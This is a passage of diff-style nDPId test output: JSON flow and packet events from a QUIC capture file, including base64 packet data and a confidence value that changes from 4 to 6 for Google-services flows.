JNotNQk7htoqJBX\/hMnFoa6P3D+kOnEu3G17VXOpjoxBo+e82xbyKTxE+HiEnZeWZL7luz5bZBmWGZc506mXLnCeZZQqiG\/9I\/FNIpPvoo3H6warZwrzbb8Um6Nvs0Ics90RO0bApWCzRG1ZbX3AHjvDgTh2p8CR9Oooi6r0cJxgwFZZY8SZy3zNyWg\/wHtBtGqhZKlBnnzNUo9ZvpjYGNFYCmpHvrwviyxBvhHkg983940o+FsWBHY4PXxHhH1BeANrMFfkbINkn+CbC2\/r3ppTRHHY4fjTIWqDjaau3fmNxn2oa4KoWNkTjA1BSXwvqc8trFGDFMCJhUs3hSHPiEoAQ531rkzeUr7wtvjAhy3yMpxtEUaaAGyPySo1NYyTXEWK8w0\/YLlmeDmev2JWcCnl7HS0O13jStUjDzYdEKkWbQEZyNXBVEhaIvowRgcn7\/v2zT1Ji\/TX8DeP9rZyEyPensHrqvCjEiXBVlBQXgUJKTAdm6SwnhUmgDIWfMcW2vD88XETNohXNP\/OdolyEZ2F5Okt1oR5HKmRMri3BoToqsELE6FkQG6EG4JyB3bG1wn7w7zqvTRpR1UjWxoXiXjFxffg92VsUmcwuEyMksgqkhRx9h0TWNRACL51r145yHnspstaxqMITdw034yIHhAL3G5uPbMdUZQJozU\/XLnjQ9V7x\/mbfIElAUaPrac3k2nvzbr5ENvEse2uDH9Q5NSX4CsOm399roi9AvuA4V7OYxCn6T1MdQz\/4\/J5eI8ez9zieLgXCZomN4Y+BUIAuOY5\/dWqfjZcWMx1s9NOKQTb1Ka9pe9XEJIuxx2s04cvGxtWZpPXA8fQ9IoJlumB17J64o1iwcDB9g1LshjWGo9lOe9FjTnwf2Uc7YISmWj+vyoFvYEhvt82NsOS0g1fbgE3nFxg5ojGIF4"} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621492846202,"flow_last_seen":1621492846202,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492846202,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621492846202,"flow_last_seen":1621492846202,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492846202,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1621492846499,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621492846499,"pkt":"AAAAAAAAAAQAl2dmCABFAAViYNhAAH4RSxM0uxSvxPU9QM0gAbsFTsB+yP8AAB0IkN0D0fi2gP0AAEU0eNeT2iVrLMv4jKHl8TcBYgCovcfBUbyiMals1lo6OENtv3m3tzUH\/6BCYnVpY+CFN6iuhjAxK4TQo8fdrcWsTOaPpoFoY2L1biWlEbkp\/x6C0kavU\/xvEB03HgfSHvx9g2E9+0QVaZrnTGMDhzE\/LCMOi99ZyzUFTLa2whyStOHkacXjeP\/fXvaRIU8Xw0e1DmF+BBORNoKDNAzHaWe3Xdqk4sXMuKcYmcsPCiNzUfbIR5I4+VLDDbiRMHE4TjaiWP1s5tp2uFI3oH8oNBxSqcPF8N1QFN8Owg0bhCA\/IS6AAO+WjLvCXNFTIFRkUX2YOFCXkduhSQk\/oHwzaVML52Ssm10WvS1irnJ1a2h+SxJBrkoqZbSa3c8eawvV0lJSss8ZpdSbSRzoN2qRfRqNsLkutWp\/l\/cD\/9NStpmQaF3kKcyrILDL5C+ND+LRujNpqDaC7rufyYb4OxX88B0MzY74bKzBpjdNd\/NyrBm8\/onpNwjnCW96RXgIjm5ELYRH09jAdke\/
LMSfgsn6fc0lbvgEQ3PiOAd21XyPj2OSsqeutdhHzHRboDg8Pn60e3mxTSQEysOZhCJu1aVdB2yGnhlHsTGM58d5JBHDE+jZDUbC06OdcJVkIv6bjuXRCqEL93W8VuYBHzKsU8Ii7A0JxSjAutjZgwMCd45KPWDsNutDQ87CFhmk5RA+fKc3pBM8cKLyE1\/D7NJxJr4GJrA53oLs7VGf6MKmlV4AsJZP6rx2xmCFhjFqHYFLBgJdnESGthy0GqSMdwYEYdqxlsQZidXrJUgJhUv\/viqRmaGGOIoeCbGdNL22EJ90SNuuCvVNhxjf+OCfozoA65mZFx5Us+WOLW813xAA7oS3jfz2r9ButsPWkueyotS4sGWbX+O7pcBxmbUlkuDeWzly\/JrdnbLf8o5IpZlL\/szeGX\/xaukbonKpw0kk35eQAFT22V0SvOQXn506i1bIeQVC6wqNBPKsgTo\/VPQcaj1aZ1Q17VqXoKPIuPlZ7SMkngAYC6FlUWvgpdcoeIcZ\/t2glrET\/TpZTHAx1vcYpwXGccxvCqJvFzp\/iEy\/P0\/s2VTVERM98qgpyC8vVMDiAXeT0c+8myMBJWMmEBB7+3YFzgV0RnhI5XMWiTiedHwgemVCeDU1kg8u8hqfknKqaVcO5tLH9t2FGmiCSrVi\/CAOeu\/vnWqt9L\/E7AUvgJ3nf\/XofTNim4vFwMW9qWfnflBAI4etDSLXlfhCF6hj05LkXpBYnhDX04dMfzMd0wbqUALjlqng3G22KPNXzcoLHgLHkSRTNkeGoexq9oBLHV6OhHb4pIzLS3SlHBQgMv0ujiz0C3WRmVVFITqTC4Ym0lFLd1XdXKIywfzJUvwG8AxVCpiWvvbn0MsvomTXCjNPteZVCsije7Ys2XOj4jFIoymLHdB7GeVOyHHeUAXfmy7fXXhR9EIO7It7pUitHoj7\/O+uPlKz4WGY1XtA5gadBlJ9hcfv1AISORgb2SzImOEaEIs1Oyben4xhUAxtnihkj2tOYt66nHUJoi6WDXV0pSiA1adbER0DGTh61m1GbsvAF6iehNm5R\/auq3cSwz\/oNuoEeWcajKe6C+bJZ0Pp4ODEB6xylysFi5Nsg\/X3yxwOUBMebO7HFdoJOx6\/anLHqvZoeJiNuEm3J93g5x\/1Nsu9QNYOSXc3CITQMMVtVZsPeOQpBypby+hqNIrDBvXDcv86XBheVQLni22zPRHvnPPVc9m1STaKuBI1rOewM0zxJ7Y1kebQ5fFy"} 
02319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1621492847100,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621492847100,"pkt":"AAAAAAAAAAQAl2dmCABFAAViYNlAAH4RSxI0uxSvxPU9QM0gAbsFTuvFzP8AAB0IkN0D0fi2gP0AAEU06G6NT+VSCrmEO3BKTHqGvRDj7zHVCi94TyNRWxU1mXbjbTRFZ+CaZvg4gqUf9xMHAUYdMHn0JKiRgnSgkHznaTtiRgEk22fQwgIxVH+hvtVpbaIsb3bOri0\/NzM4wzGQk0hhFXdooXMc+tmV57mVI8vF9JmkYZ3AY2F8JLlv1BxIxapiJTD7gwuZ9nIypLmrrtiyGXxIl88PM6uDd1lRl3qoQ0oiA9c6pPTCRB8dAQJ4YYuVmuW5TbhruKDZ8PB0MJQOb013X2nAghH9Hwha3CvwiU2omtgMvjkZesxfUObKfDTbFEMzL\/jrRFh\/+J0F\/EGuyjhTpDu6+xG8itbCbnAQOy7WuW5TYEsc0xXOAoc6KlEwmQiQKfPKtF\/2CZ9SjafQf4Oy5m1SaS8su+ueaSjJsX7m0K38THdf5jQ\/Fl4bTD67mwBO+f0scmP6GL\/mbPaoaMUGAzlNUBiMCCExtPs8A0mmZK+0smBu+L2yDxhIAkqjH2OcdLR11dCH0QdOU\/qRLGN41DI\/\/cqIkx2ijbR9g+OiikFtGSy6n2LA3mBBdnd2T0hBdnX9fIo78omWMaICsidEwWQIYfSO+LyI2h4JvJoNJSJxTMpQux0CHDeflYgxqteaTQCHdOZSOAFozGJdqpUc4ukomNxsQCMV4GAyI75uC+kKJhbeM\/HEqnNyY0rfHOQrHusbMJJ7FCv6nM11\/2Oo1Hh2eJK88As7gRhqPVzeuz\/U\/xXz2EOtHRBBzR+oprpB0Uws8\/b54W5T+yFgV3JV567bJDHBaKHV4CypvviObj3VPZSDfbx8ZDE8cPozymxrQGwJnz\/SSVKg7yHHCcAhBIh9T7YzMsItriGNvgnX0urwJbHBIwvT0elkkqojq4KIx\/7Yh8uMFRpT07cYIl6MdN\/iCqwh1vqZbBwbGpfQR\/HAz4IypJz+zywRzPQmL4Zjd28OKKYaEI1VO6TnaZathnaIz0cGz41\/3ec6ubKFkmDYBvMaCkYbP938UlSyqwlkgR59+GTpwl2zVUb\/faKExO\/4NpJhLquIMi1hgHnj1b89iIzZEVRRmuruxSFJoxbfnenirV2KkIVM3rdYaAMxCt99+sRexO3VcGSAJA03hK\/5kyXvD1AEq19Fa4iw1nUrJXngE0gL+UwmRFL0ICfLh\/hdSEO2viit7tS9gNA4BJCujAoVC7fRr\/9\/osYAvWoTHo08WZH2WCiQAis7vlYiYCukAhDVyYp0qF36aPAJIVN4AZeZh\/UwxvSF7ScBTb4zd2qrmWQ\/QZp4LrWYepsYYrlR5PrdyOcgmPlz88MR+J+nuXlWXgCXcgNN1OrnHnxsLeZAZ66ipsvP1GZZJYJb3sLc9AcafS9torkCmsXvmQslIdm+okpX\/V\/b43ll6bHHGrpUQUv\/PNxOHHQOhXVrn7vat1ejZj90Ni6sGu+5HaMpi1OLD1mKP68o8RFXXDIt
YMsdIXHnUpqZjqKI3C+edj9oApTrZsLkp61Xxv6XiA96YE2VPsxN+ezAXexypGEJk04q7+rYgpGY24NJp4tAUHgsYUOjphIugzRYKjYfTmKFGPs84dxLcAVTKE13VQOFcTXkt62OXTrEtGBfQUWVDuQm\/p598jzYh96BGCH7WptCesorqdhDG\/2HxAPEOEo7SWItolevicv20QLakpWkPPm17h6hzM\/rWFNZM9vbByjMoWPhIUCyRXi\/CbuDLLXeA9rb9\/9+r7QoHKocX6ChoPNabp8O8SrguQ6Jwt8O7ZEnphGvVCAS+swijeKY"} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621490937698,"flow_last_seen":1621490938810,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492848301,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1621490940042,"flow_last_seen":1621490941568,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4050,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492848301,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621490996100,"flow_last_seen":1621490998210,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492848301,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621490937698,"flow_last_seen":1621490938810,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492848301,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1621490940042,"flow_last_seen":1621490941568,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4050,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492848301,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621490996100,"flow_last_seen":1621490998210,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492848301,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":107,"packets-processed":106,"total-skipped-flows":0,"total-l4-payload-len":143100,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":70,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":70,"total-idle-flows":69,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":321,"global_ts_msec":1621494599158} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621494599158,"flow_last_seen":1621494599158,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621494599158,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1621494599158,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621494599158,"pkt":"AAAAAAAAAAQAJ0huCABFAAViVlNAAH4R6ZY0uxSv0OWdUcmjAbsFTknBxv8AAB0IjEZZ7Twbo9wAAEU0kJjhzp3PFc23t3I6EGlw9Nw6Qc1SUTVOLXwfMjNoeRLiLBXl1p7gZhSviv9JQfR9Wlb4B\/LvGDs5HubqNvjy9gSGhUAoZKHgVyQNQ8sPeb+zAK4\/+3Qxk6DgExGf6DSCsV9UWtXpGmfgDVaGUIKvjlEvPlaJQ79FJEUNmnxqw+Su2z56GwGnZs3etUJY7Thex2ui8FvucKYZYvgu6wRjounSXDUxthqRvvbGPyVi+\/zvUh6JQJ+TX8SC4eFZqQp+jb7GmBSIOMm\/Ec1jvbOi\/aliVkt3gPEwixlo\/RAm9MQzPwfq70hgSkoJx46ldrVQcWlKc\/yvw3p2stokg4mvv0O\/AA2g32B4XP1S2bCDnPSyjwe\/FFG3OX0VFLRXvjekO4to1p9XPgmuVtwpQLf4lyNVfpdhvYlgoEwUjM9uaq3UiXNUhHqjQ0L4DXtkhhjRWeULrLkU0f0REry3Q\/LckyGikkZkv+F+HV9G2NIDV+IxZQ6OWB7DM0Z83epJzGFj5\/uYXKmk+BbONhvtUkbwsIoFVtH1Q4vZLc4nHVR23cDEhozshXDSC7PWSfxClKjneDPQdrDLr0vgsH8xBaaaTioZjwEVMdhbN8FsX\/rL6bMhM+b9iF41rToFIYIcSRksL0LulUfkhaEGqLUnpKwuyqlF5UpMMngzqdoYUpd0fzQgxA99TnPf\/ZibGXba4goUBq5aTeKljwjQvpfeDm0N71QVgSNFdU8sTF5RiM0jkfLo8VOjKRpirBNuYJ7DIAlvof3NA0Grn8dQ7f8YWlV1lHjXfjMeogHBB\/P2mTQzXX3ArnxmdG\/i2\/iEZexnqGBauYfcvUbCb4yWGyQ+uf4buf9Z9AyMQMsYl+B8ptpOp5x0NGkqHT26QYAV+A6a2HfCBCEg66zE4TRZrMqr6q6\/a\/IE2n6Yv2maemjmwg4iHbv195EUc9666Xw\/knVVZHK8GuAAgFkIfnCTuFvSaCEwbnOXJ3s++e1rXdNr+Hg0b2Zbi4Ef9DQNeQpBIh3Ur7TEj8IDc\/NOM35lp7oYr7QO2zj6YAWebmCqb56wXDDn5mBBgu37fQhnakjMV7jHPkryVTXnFiOaL\/CVFGTvS46bBvmJkLPq4HRzoYbmboqQx4mXB1LvgMfXrHU3l7iZLz\/2XPIqh+KYqtzkanEAs3nElKsp2sB5mExQqIIubK+l5dcRdQNfCBmPrColZiPglV6Hv5liYk8JJ8Kbi6iN9RFbJHoGR+dLu3tvqT\/dah4soYZhtI9JnUfTXwZhINQmrqt11PjUN5xy2FY4x7Hur7+46IjhG3mRUQfKZk31z3sThwR5xjbX16LSIZERlLjpMdpm+lcm2fcsmWRXoQTgM8\/ugnLqEQDMuUDGvRukyIwk88fRryMIRKV8KDVhw4+vJ2EZLvYDeRSBFQdsKzSa\/hTqJc1bTtpaEUuGT2u\/or12NqrqQU7wVWi3YOk1X
+OSoNbRXciEI2LGKLRqsnbsAqS+IJRbeA+3y8sXStW3YAt1gPKq7Pgq5cW4+8O1NmIlJ6gz1+lq\/WisqZhapMN5rUgoylNO5YJPHuzHdkOWHinWJ52NWCXnOYekNmJLkh41YrSQvM7Zm1APRBCuH+h9RHttH1u+s9o2TQ4uAPAAFWi6bluDPG8hlbO7uz7OAKhhEJ239ij+NXPbweBE66DiURdi7Gj3kcjPg3OPsIP1L\/pUMzoKutj3ZBRiMec+XXaGz3s5ppe5ssD\/WW3cQpGois32lgVeJrDmpDxCsEoxF\/1Tdai7z0bd"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621494599158,"flow_last_seen":1621494599158,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621494599158,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621494599158,"flow_last_seen":1621494599158,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621494599158,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1621494599466,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621494599466,"pkt":"AAAAAAAAAAQAJ0huCABFAAViVm9AAH4R6Xo0uxSv0OWdUcmjAbsFTojgyf8AAB0IjEZZ7Twbo9wAAEU001Nedh8jl0mRxcN7+5ymyAhdk9NMUwxYze3lIyYWk2jP0t92iE+L\/yAM4MnpE0YCo8Yj\/sG9IYL5\/Jqz+v0\/7PZJlA72+xIp\/Zz2FHFmfCsrXJBq8qMZr4yMJUaTQ79L\/KyQSvCHFBgMRJUhRKX69bPpnAnksqJirAlkiGBvT0YEt9mMoiR55EP1zkREk8I1QRdfacOBiC1xn5oSmyEOrHRGNMlEIFFRJLgWr0XXotnRIEGBlAPOKZPZzQapDug6\/9gRem0rTXsSVsMhbztxGw\/vtcuhxHhCL\/sRMBYP\/by5OhP3fCsCPd3sspB94dh0sVKqpEvWHKRXI5qkQ8i0KiE6NKXE1Nhqr1NvADQnhHZesnr3pbbwRzdVtIdnVbg+KpCF5NoQHX8ZH8QDyNjWRE1jnBpB6l3OJ1sSKdAgaiw8Ptd9k6AGoDKbmF4ICOpOWeyjIS5UuYgKNS4W1hKboP4A0l98z1AMF1cWHOyoMcwHulLBVCbBON1h3OyJxCb+qSsMMjsumD6d4H94KHLyQlTJDPLNq5+27EH4JgoPrQnrhU70QkhyDGeMEA08Y3NMvkMXs9ScL+i2jzv5BFhQo\/tMXR8AuhJIM9staI9B52\/FDML\/NHMdUhCiYzlzdj1bMiHMjmHtScQaruiH9wV2aP0flj8aUj5pRTOyuCcs7Yj8tosR5Q7Bc4J09A\/d7uBuSzN6SiWaOfxKRsQjRiB+PoBFp3RyZI15eo0FBDGFV9z7YaWXpK\/QUxQVAHHMQr6q2XYdo34fAYM5WCCSw55MSvIPkgf5o0DYE25dUpBH2wSkVcAbptZSsQKNwzN7dqVdVmsRhsSqNIVkr94Mgea0XDKOPfcuA0DHWVB2NpAqq\/2KIzHInDQ6qFc5M4nF4o54hvOuiL+GByVbEQt\/\/entGulu7X2JEiyqmYk92gVvJPNI8Bwemp05+Q+twxKscsRsU5w0Xn4LJ0aYLhTJviBC5fXR8Pc1viFBHXYXbarbLaQ3PMRows7y8XdeOl\/bsuCdG0ch6eIFsRvMMwjmhUgHj6ZC2WxikfNArVb9\/GqEMsVsVGaSerfdOb8LTsT5SWnrIpnMmWN2uIjFPgyu8\/qOno2piahKRLskEqrRUpNfLzBpNxlY9abVFtVrTQFSn+Bv0pyQSJS4S8yhl2CkBgItTkREH46KOs97E\/bHK\/yGj3NexQldO92K00H85joQ7nGUScRMKfqI
pqXecJxSM6OAroxCymb3vSJmrnHwKgY0lo+ETPgqaXNxSMmLS\/2JsUVg9IcXwjmP\/hdzYDT4SjdN\/NCNzQLqEDcD8ycSm8xG+d2Pvjum+8NDSNcasGk4ZrSjQeckzYfCVt3NCKRhy2IHBlWjMTzzyU6DPzhIcLNpxSDWwl1i2IaHmb1isu27465MaWunzERUUlOR+kzIqaRHPTGq7D8F9Wz\/Lo9VOIM5KywiZogg8pDlQ7rw5vQ2wQF5TAz7WtDmtXKPT6M2TZLh0RCInRTlcWnKpFX\/38oEnnKrzaye2ifSAUvdyfSNZNXjY2UYGYg6Xrow72NLPTC9O\/+G9i89rbi0HpJcLFfEQxFMQ1sztsPWaTAohU5yyk90ga7gEn9IGLftr8nTGe13R6POb\/td5pOruFoWbUnJjSDEOgXIJWatBnyyLDn9kNeLMGnrjo17scXrhmlTzgSFpT8tsc+6WK+4OwCSK7uN2VYU5zw7G2oqvb\/XH2izKQLOvApMhxYFBkNigiUw+ruYaH6KQmSISbShAPpmf6e3Ok4EN\/1H"} 02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1621494600068,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621494600068,"pkt":"AAAAAAAAAAQAJ0huCABFAAViVq1AAH4R6Tw0uxSv0OWdUcmjAbsFTrvcyP8AAB0IjEZZ7Twbo9wAAEU0356vdnE85kFrnK9PnoN7N\/6cuhgJZOurPVLrUkSIEhjazS+SHD5nphYh\/Ei9oaiDY8Opbyw\/qBtRNMamhXjzOXvgznSeUsgwy1Y\/wE6Z8L\/PLMFoRidzgyIEn6rjIJKHwzzF2KGrVstlhyz2RTwgIvHMy9MIjilbgudOkuRl5cUCx4DqELWc9uRZ3o5vsRYtLfQcGLcZxuZNq+qR4l\/haEcF\/bo9RHUYHevsrmU3WGlZq2VVs06I2zfKkHonNVQotk1bro8ws9jUj7jyxUbwzWCdp3Y0J2vApeu9ELE8rutr0ZnW7RegpTFdI+\/pjDsy7w+XtT1RZkjL7KyYUDlQxQdEaIMNGHrAqXcCdWe\/PGc8CDZEYRQG4imIq3PmqUKfLT1H1z5PjAZqsks7C4eHUMCY+G0m1pwUNctiLiFN\/1UbsvMid1sQh6WBXSJiOYMPhFaj32vm6bQzmsW166O9cP+ju7nY2kDwHjX1VRLKHDBPT+BqIPgfQsjJdmUiCoPO1j6aSYQVgo0uGE74BSKhT3W7x1ONh6fXLzmN7+wWyuCCjfUqF68k4DNAO5ugG5nw7CpIh4otPJ3HMgytjz\/1hKjAQhcC4anVdWe0zLhoQLK+s1Pp+iUPac8alWHNwAjuYOUrtvLlDW5GtHXWtZeiHtJznZvOZ++hzVm33rcGcrU